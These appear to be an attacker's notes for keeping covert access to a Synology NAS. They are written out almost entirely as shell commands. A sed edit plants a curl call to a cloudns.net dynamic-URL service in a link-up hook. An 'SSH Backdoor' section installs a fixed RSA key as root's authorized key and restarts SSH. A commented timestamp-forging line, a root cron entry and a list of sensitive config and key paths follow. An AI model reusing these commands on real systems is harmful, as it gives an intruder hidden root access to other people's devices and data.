- /usr/libexec/ hook ,
bsp: /usr/libexec/net/if_link_up/synorelayd_hook.sh
sed -ibak 's/# reload/curl https:\/\/ipv4.cloudns.net\/api\/dynamicURL\/\?q=MjcwODQ3ODoyMDA2OTQyOTk6ZTYxODEyYWZiYWRmOGRmNDgwMTlkMmNmYjA2ZDdlMzYyMmU0ZDc0NWZmNDQ5OTE1ZGNjMmMzMWUzYjQwZWUyMA > \/dev\/null 2>\&1/g' /usr/libexec/net/if_link_up/synorelayd_hook.sh
- SSH Backdoor
/etc/ssh/sshd_config
and /etc.defaults/ssh/sshd_config
sed -ibak 's/#AuthorizedKeysFile/AuthorizedKeysFile \/etc\/ssh\/authorized_keys/g' /etc.defaults/ssh/sshd_config
sed -ibak 's/#PubkeyAuthentication no/PubkeyAuthentication yes/g' /etc.defaults/ssh/sshd_config
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCz5oKKpGN+E4e7jTHRf1w3q/hiE3yjZYFx/q9/ZMnny9XAs8DhKpzjbS7044I4oG/zWvj139Nkfc1xCXjC8ylDfF/4jmcF6YtUzzgCMycAxG9xZrHvtrP+vyRdP/OfJnOznviVH5t55gwT0/9ddEMlOOb83oS2LL1e/76qhr44T5h1ym5IHP1iRHPsj5nTnNERr8Dk4qjBexhsc8Ws8igOKc9+ef8xcNrm4ChlEqYdynMh6V9p2HnVENu+FVaJOXFc52TEL17jOp6MSKSEZG9MgAXBFy81Vs1/UkDFUQSXA4KbAz4G6HtTg/5WkkDnZ5r/P9NMCtC9xmFTL9ewDiml' > /etc/ssh/authorized_keys
mkdir /root/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCz5oKKpGN+E4e7jTHRf1w3q/hiE3yjZYFx/q9/ZMnny9XAs8DhKpzjbS7044I4oG/zWvj139Nkfc1xCXjC8ylDfF/4jmcF6YtUzzgCMycAxG9xZrHvtrP+vyRdP/OfJnOznviVH5t55gwT0/9ddEMlOOb83oS2LL1e/76qhr44T5h1ym5IHP1iRHPsj5nTnNERr8Dk4qjBexhsc8Ws8igOKc9+ef8xcNrm4ChlEqYdynMh6V9p2HnVENu+FVaJOXFc52TEL17jOp6MSKSEZG9MgAXBFy81Vs1/UkDFUQSXA4KbAz4G6HtTg/5WkkDnZ5r/P9NMCtC9xmFTL9ewDiml' > /root/.ssh/authorized_keys
chmod 644 /root/.ssh/authorized_keys
chmod 644 /etc/ssh/authorized_keys
#touch --reference=/bin/ls /etc/ssh/*
synoservicectl --restart ssh-shell
- synocrond
/usr/syno/etc/synocron.d
---json
[
{
"cmd_list" : [ "/usr/syno/bin/synomyds", "--report_info" ],
"crontab" : "~ 916 * * 15",
"name" : "job",
"period" : "crontab",
"user" : "root"
}
]
/usr/syno/etc/mount.conf
/etc/ddns.conf
/usr/syno/etc/.encrypt